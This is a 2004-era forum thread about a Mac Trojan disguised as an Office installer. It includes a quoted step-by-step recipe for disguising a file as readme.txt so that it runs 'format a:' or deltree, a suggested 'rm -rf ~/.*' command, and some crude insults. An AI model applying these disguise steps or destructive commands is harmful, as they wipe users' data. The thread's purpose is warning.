You now have a file on your desktop called readme.txt with a notepad icon. Make sure there is a disk in your drive that you do not mind being wiped and click on the icon. The file that you click on will do a format on the disk in the A: drive. Of course, the hacker's icon would target another drive, or maybe have a name such as 'game.exe' and with a command to delete your Windows directory or (deltree
If the PIF extension were not hidden, this would not be able to fool you."
Or, you could also do the following:
"SHS Extensions
Scrap files can also hide embedded commands. Following is a simple test:
1. Make a copy of notepad.exe and put it on your desktop.
2. Open Wordpad
3. Click and drag notepad.exe into the open wordpad document.
4. Click on Edit and select Package Object, then select Edit Package
5. Click on Edit and then Command Line
6. Type a command in the box such as format a:
7. The Icon can also be changed from this edit window
8. Exit from the edit window and it will update the document
9. Click and drag notepad back to the desktop
10. Rename the file that it created (Scrap) to Readme.txt
You now have what will look like a text file. If it is run it will format the disk in the A: drive. As seen in the example above for PIF Shortcut Extensions, the hacker could use more dangerous commands."
Various other types of info available there. Enjoy.
Try not to let life get in the way of living.
I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta. The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.
When was the last time Microsoft released ANY program on a P2P network?
I guess I should say official release.
'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'
...Ten seconds. Feel the raw power of *BSD!
Not sure what's wrong with your copy, but NeoOffice/J uses the native print capabilities of OS X: you get PDF printing for free, right there in the print dialog. Are you using an older version of OS X? I forget when they added PDF printing.
New versions of OpenOffice have an "Export to PDF" option that makes very clean PDFs. That was the feature I was referring to. Running the document through the print system is workable, but doesn't produce documents that are as nice.
Javascript + Nintendo DSi = DSiCade
For real tho' that is the funniest thing I have heard all year, and I am Mac Tech Support. So the rest is offtopic.
Even (sic) "free" MS software is wac mac crac[k] Office users only use it because they have to. Office on the mac only increases their market share. Has Anyone really been pissed to get an .RTF file. It's, a Mac but virus checkers don't allow for stupidity.
Go to http://kde.opendarwin.org/ and run the installer and step well away, go do some yardwork, play with the wife, children...Tha pussy (or dog) do whatever. Then when you return, in the '/Applications' is a KDE folder the real deal is in /OPT and it is double-clickable. I could put my two year old on it. it's sawheet!
--Shaddup and support your local PBS station Plan for it
"why..."
M$oftware is an order of magnitude more indecent than even the raunchiest of adult videos. But that's only my opinion as a part-time software tester and full-time prevert.
I would not be surprised if Intego planted this themselves to try to drum up business for the nonexistent Mac antivirus market.
I hate sigs.
Since people are reporting to Macrumors that they are already receiving their copies of Office 2004, the guy's story that he thought he was downloading a "public beta" really doesn't hold up in my mind.
On a few samples I had, there was no difference between exported to PDF and printed to PDF. YMMV, I guess.
--AP
Any Mac user who is delighted that a Microsoft icon looks "trustworthy" doesn't deserve their machine. I think we should send out some iNinjas to kill them and bring their machines back to me so I can make them happy and give them to deserving users who won't be complete retards.
Cthulu saves... in case he gets hungry later.
::helping geeks get laid since 1983::
Most M$ based worms are only a few K; it took a whole ISO image to bring the Apple down? That's really not too bad :)
A loop, by its nature, continues. If that didn't make sense, start reading this sentence again.
This is 2004, you should know by now not to open a file from an untrusted source.
So stand up everyone, sit down all those who have downloaded a binary only file from the internet that they didn't personally verify.
Now stand down all those who downloaded RPMs or binary equivalents.
Now stand down all those people who downloaded open source applications but didn't check that the configure and/or makefile script didn't do anything nasty.
Now stand down all those people who didn't go through the source code line by line to ensure that nothing nasty was in there.
Hmmm, no-one is standing. How unsurprising.
The fact is you deal with things that you cannot truly trust on a day to day basis (hello Windows and even the Linux kernel). If you can't personally verify every single line then it's untrusted.
Anyone who says "don't run something from an untrusted source" is preaching something which is realistically impractical to actually adhere to.
Avantslash - View Slashdot cleanly on your mobile phone.
"UNIX was designed to run on mainframes and serve dozens, hundreds or even thousands of users."
:)
Actually, UNIX was designed to run as a game platform on a PDP-7 minicomputer.
From Origins and History of Unix
"Unix began its life on a scavenged PDP-7 minicomputer[14] like the one shown in Figure 2.1, as a platform for the Space Travel game and a testbed for Thompson's ideas about operating system design."
"the Microsoft icon looked genuine and trustworthy"
Ha Ha Ha, serves him right!
What about the fact that it was probably only about a few kb in size rather than the several megabytes that it should have been...
It's 2004. Is there no way to run a program in a sandbox and give it limited privileges by default?
For example, you could run the app with read-only access to the filesystem, and no network access. To prevent noddy DoS attacks the process and its children could be limited to 100 megabytes of memory and ten fork() calls.
Better still, the app could have no access to any file apart from its own program code (i.e., the files inside the application directory). If you want to view a file in the application, the file manager program passes it an open file descriptor to read from, but only after you have explicitly selected the file in the file manager and asked to view it in the untrustworthy application.
This could also be done for IRC clients, web browsers and other programs where a serious enough bug could open up nasty ways for others to hijack your computer. There's no real reason to run these with full user privilege. They don't need the ability to delete arbitrary files from your home directory, so why do we grant it to them?
-- Ed Avis ed@membled.com
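As an added illustration of the point made above (not code from the thread or from any project), here is a small POSIX-sh wrapper that runs a program with HOME pointed at an empty scratch directory and with CPU and memory limits applied; the `run_in_scratch_home` and `landed_in_scratch` names and the `fake_installer` stand-in are constructed for this example, and the memory cap follows the 100 MB figure suggested above.

```shell
#!/bin/sh
# Added example, not code from the thread: a minimal, POSIX-sh illustration of the
# "run it with as few privileges as possible" idea. It is NOT a sandbox. It only
# (1) points HOME at an empty scratch directory, so a payload that does "rm -rf ~"
# can reach nothing of value, and (2) caps CPU time and, where the shell enforces
# it, address space at the 100 MB figure suggested above. A program that finds the
# real home directory another way (getpwuid(), a hard-coded /Users/name) is not
# contained; a separate user account or an OS-level sandbox is the real mitigation.
set -u

# Run "$@" with HOME redirected to a fresh scratch directory and limits applied in
# a subshell, so the caller's own limits are untouched. Prints the scratch path so
# the caller can inspect what the program did and remove the directory afterwards.
# Returns the program's exit status.
run_in_scratch_home() {
    scratch=$(mktemp -d) || return 1
    if (
        ulimit -t 10 || exit 1                # at most 10 CPU seconds; fail closed
        ulimit -v 102400 2>/dev/null || true  # 100 MB address space where supported
        HOME=$scratch
        export HOME
        cd "$scratch" && "$@"
    ) >/dev/null 2>&1; then status=0; else status=$?; fi
    printf '%s\n' "$scratch"
    return "$status"
}

# Did the contained run leave a file of the given name ($2) in the scratch
# directory ($1), and is that directory different from the caller's real HOME?
landed_in_scratch() {
    [ "$1" != "${HOME:-}" ] && [ -e "$1/$2" ]
}

# Constructed stand-in for the thread's Trojan: it writes into "~" the way the real
# payload deleted from it. Under the wrapper, "~" resolves to the scratch directory.
fake_installer='printf "ran with HOME=%s" "$HOME" > ~/installer.log'

if [ "${1:-}" = "--demo" ]; then
    dir=$(run_in_scratch_home sh -c "$fake_installer")
    cat "$dir/installer.log"; echo
    rm -rf -- "$dir"
fi
```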
they only got morons to use mac on those ads, so now they get what they deserve
subject says it all.
No, I didn't do this too, if I did, I'd post as anonymous coward.
These are some of the things molecules do...... given 4 billion years -Carl Sagan
I call bullshit! The whole damn thing is unlikely. The quote (attributed to some mystery person?) sounds exactly like it was written by a copywriter.
Here's why:
1) How often have you said, or written, "and to my delight" in normal correspondence? Or "and to my delight" for that matter... (Even if you are from the UK...)
2) How many Mac users would use "genuine", "trustworthy" and "Microsoft" in the same sentence?
3) A Mac user would most likely say "double-clicked" instead of "I clicked on the installer file".
4) This quote has no attributable source. Who said this?
Judge for yourself...
http://www.macworld.co.uk/news/top_news_item.cfm?NewsID=8664
I have CF13 handle all my incoming email. I'm getting unwanted file attachments that are likely brand-spanking-new malware but haven't been detected yet by the antivirus programs as malware (just released into the wild). So these suspect file attachments sit as 'text files' on my hard disk drive waiting to be scanned and identified as malware--a likely possibility.
I use Outpost Firewall to keep malware out at the Internet data transport level. Using both gives me peace of mind after my run-in with Klez a year or so ago....
If you want to kill your hidden config-files, try this:
rm -rf ~/.*
You can view these files like this:
ls -al ~/.*
The first will give you some error messages when it attempts to delete ~/. and ~/.., which are /Users/foo and /Users (assuming your home directory is the OS X default /Users/foo). The second will not show you what you expect either.
The correct shell-glob pattern is probably ~/.[^.]* ([^.] means any character that isn't a dot). That will miss files called silly things like ..myfile; if you have such files, which you probably shouldn't, a pattern like ~/.[^.]* ~/..?* will notice them too.
To list hidden files, just doing "ls -a ~" or "ls -A ~" is simpler (I don't know whether -A works in OS X's BSD ls, but in GNU ls it's an alias for --almost-all, which shows everything except "." and ".."). As usual, add -l if you want the long-format listing.
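To see concretely what each pattern from this exchange expands to, here is an added shell example (not from the thread); the `make_fixture`, `expand_glob` and `glob_includes` helpers and the sample file names are constructed for it, and it only lists names, never deletes them.

```shell
#!/bin/sh
# Added example, not code from the thread: lets the shell expand each glob pattern
# from the discussion above inside a constructed directory and lists the words it
# produces, so you can see exactly what "rm" or "ls" would receive. Nothing is
# deleted outside the temporary directory. The POSIX spelling [!.] is used for the
# thread's [^.]; bash accepts both.
set -u

# Constructed home-like directory: an ordinary dotfile, a hidden directory, a
# visible file, and the awkward "..myfile" case the reply above mentions.
make_fixture() {
    dir=$(mktemp -d) || return 1
    touch "$dir/.bashrc" "$dir/..myfile" "$dir/visible.txt"
    mkdir "$dir/.config"
    printf '%s\n' "$dir"
}

# Expand the pattern(s) in $2 inside directory $1 and print one word per line,
# sorted bytewise. The pattern is a literal written by the caller, never user
# input, so eval is acceptable; it is what makes the shell glob exactly as it
# would for a real command line. Failure mode worth knowing: a pattern that
# matches nothing is passed through unchanged (POSIX sh has no nullglob), so the
# command would receive the literal pattern text as a file name.
expand_glob() {
    (
        cd "$1" || exit 1
        eval "set -- $2"
        for word in "$@"; do printf '%s\n' "$word"; done
    ) | LC_ALL=C sort
}

# Same result joined with single spaces, for comparing as one string.
expand_glob_line() {
    expand_glob "$1" "$2" | tr '\n' ' ' | sed 's/ $//'
}

# Does pattern $2, expanded in directory $1, produce the exact name $3?
glob_includes() {
    expand_glob "$1" "$2" | grep -Fqx -- "$3"
}

# Whether ".*" also yields "." and ".." depends on the shell: dash, macOS /bin/sh
# and bash before 5.2 include them (hence the rm errors described above); bash 5.2+
# skips them by default via its globskipdots option.
if [ "${1:-}" = "--demo" ]; then
    d=$(make_fixture)
    for pat in '.*' '.[!.]*' '..?*' '.[!.]* ..?*' '.nothing*'; do
        printf '%-14s -> %s\n' "$pat" "$(expand_glob_line "$d" "$pat")"
    done
    rm -rf -- "$d"
fi
```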
Lemme guess: the download actually contained the iTunes 2.0 installer or Safari build 48, right?
I recall all of those DOS based "2400 to 9600 baud converter" programs that people used to upload to BBSes. When run it created a virus or trojan on the system. This is nothing new.
File sharing networks are full of files like that which are too small to be the real deal, yet people are tricked into downloading them, thinking it is what they are looking for.
This is not a problem for me, until I start getting support calls, or emails from people who got infected. Please clean my system so I can get work done, they ask.
Worst case I had was almost 49 trojans/viruses on one system that had someone running a file sharing program, and their daughter downloaded all the crap she could find and ran it. So I deleted the file sharing program and all the infected files. I installed the latest free antivirus, antitrojan, anti-spyware, tools and cleaned the system. Somehow it is infected again because they complain that it is running too slow now.
On one of my test systems, I got into a file sharing network, and started to download random files I searched for. I had several malware detectors. Most of the files downloaded were malware and got deleted. I'd say a good 87% of them were infected. No files were run or kept, I was just testing the malware detectors. The hard drive was reformatted later on.
People get what they pay for, and if they try to cheat the system, they may get violated by malware.
Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.